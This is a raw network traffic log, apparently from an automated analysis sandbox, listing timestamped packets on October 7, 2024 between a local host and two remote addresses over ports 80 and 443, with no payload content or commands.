Oct 7, 2024 03:15:41.568010092 CEST	443	49846	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.568587065 CEST	49846	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:41.568623066 CEST	443	49846	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.569235086 CEST	49846	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:41.569248915 CEST	443	49846	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.569879055 CEST	49849	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:41.569916010 CEST	443	49849	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.569993973 CEST	49849	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:41.570228100 CEST	49849	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:41.570240021 CEST	443	49849	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.610747099 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.610785961 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.610821962 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.610842943 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.610877991 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.610888004 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.610923052 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.610955954 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.610979080 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.610990047 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.611018896 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.611022949 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.611057997 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.611063957 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.611107111 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.611109972 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.611152887 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.611166000 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.611206055 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.611215115 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.611258030 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.611259937 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.611310005 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.611313105 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.611345053 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.611363888 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.611377954 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.611404896 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.611438990 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.611462116 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.611495018 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.611526966 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.611545086 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.611557007 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.611577988 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.611596107 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.611629009 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.611628056 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.611661911 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.611680984 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.611696005 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.611712933 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.611747026 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.611748934 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.611783028 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.611799002 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.611834049 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.611834049 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.611867905 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.611885071 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.611921072 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.611921072 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.611954927 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.611988068 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.612008095 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.612009048 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.612060070 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.612061024 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.612099886 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.612108946 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.612152100 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.612154007 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.612204075 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.612205982 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.612245083 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.612258911 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.612277985 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.612298965 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.612313986 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.612329960 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.612346888 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.612365007 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.612380981 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.612410069 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.612415075 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.612432957 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.612448931 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.612478018 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.612483025 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.612500906 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.612514973 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.612531900 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.612546921 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.612564087 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.612581015 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.612600088 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.612613916 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.612632990 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.612648010 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.612664938 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.612680912 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.612698078 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.612715960 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.612734079 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.612749100 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.612767935 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.612786055 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.612802029 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.612818003 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.612833977 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.612852097 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.612874031 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.612884045 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.612905979 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.612921953 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.612945080 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.612953901 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.612976074 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.612987041 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.613006115 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.613020897 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.613037109 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.613054991 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.613075018 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.613087893 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.613106012 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.613121033 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.613137007 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.613153934 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.613172054 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.613188028 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.613210917 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.613220930 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.613240957 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.613255024 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.613275051 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.613289118 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.613323927 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.613326073 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.613357067 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.613362074 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.613385916 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.613389969 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.613404989 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.613421917 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.613437891 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.613456011 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.613470078 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.613488913 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.613507032 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.613523006 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.613554955 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.613558054 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.613576889 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.613588095 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.613605976 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.613619089 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.613643885 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.613651037 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.613681078 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.613682985 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.613702059 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.613715887 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.613732100 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.613749981 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.613765955 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.613786936 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.613801003 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.613836050 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.629776001 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.629806995 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.629839897 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.629864931 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.630048037 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.630076885 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.630093098 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.630121946 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.630131006 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.630178928 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.630187988 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.630232096 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.630249977 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.630278111 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.630283117 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.630323887 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.630331993 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.630369902 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.630383015 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.630415916 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.630425930 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.630454063 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.630472898 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.630486965 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.630501032 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.630537033 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.630537987 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.630567074 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.630582094 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.630599976 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.630613089 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.630634069 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.630650043 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.630666971 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.630698919 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.630701065 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.630717039 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.630733967 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.630759001 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.630768061 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.630789042 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.630801916 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.630817890 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.630835056 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.630851984 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.630867958 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.630887032 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.630902052 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.630917072 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.630935907 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.630956888 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.630969048 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.630985022 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.631001949 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.631028891 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.631036997 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.631046057 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.631069899 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.631093979 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.631103039 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.631134987 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.631135941 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.631154060 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.631169081 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.631187916 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.631201982 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.631217003 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.631237030 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.631252050 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.631272078 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.631290913 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.631305933 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.631330967 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.631337881 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.631351948 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.631371021 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.631402016 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.631424904 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.631432056 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.631459951 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.631477118 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.631489038 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.631510019 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.631539106 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.636801004 CEST	443	49845	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.636949062 CEST	443	49845	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.637005091 CEST	443	49845	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.637013912 CEST	49845	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:41.637073994 CEST	49845	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:41.637435913 CEST	49845	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:41.637469053 CEST	443	49845	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.645317078 CEST	49850	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:41.645374060 CEST	443	49850	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.645447969 CEST	49850	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:41.646469116 CEST	49850	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:41.646485090 CEST	443	49850	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.665602922 CEST	443	49846	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.665785074 CEST	443	49846	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.665865898 CEST	49846	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:41.666734934 CEST	49846	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:41.666764021 CEST	443	49846	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.666793108 CEST	49846	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:41.666807890 CEST	443	49846	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.670639038 CEST	49851	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:41.670691967 CEST	443	49851	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.670795918 CEST	49851	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:41.671097040 CEST	49851	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:41.671117067 CEST	443	49851	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.701906919 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.701939106 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.701955080 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.701971054 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.701988935 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.701989889 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.702018023 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702028036 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.702033043 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702050924 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702075958 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702083111 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.702092886 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702109098 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702109098 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.702133894 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702148914 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702152967 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.702166080 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702181101 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702195883 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702200890 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.702213049 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702233076 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.702254057 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702263117 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.702269077 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702292919 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702300072 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.702308893 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702323914 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702341080 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702342987 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.702356100 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702373028 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702389956 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702399015 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.702404976 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702420950 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702431917 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.702438116 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702454090 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702460051 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.702469110 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702487946 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.702495098 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702522039 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702523947 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.702537060 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702550888 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.702553034 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702569962 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702600002 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.702613115 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702626944 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702640057 CEST	49782	80	192.168.2.5	95.164.90.97
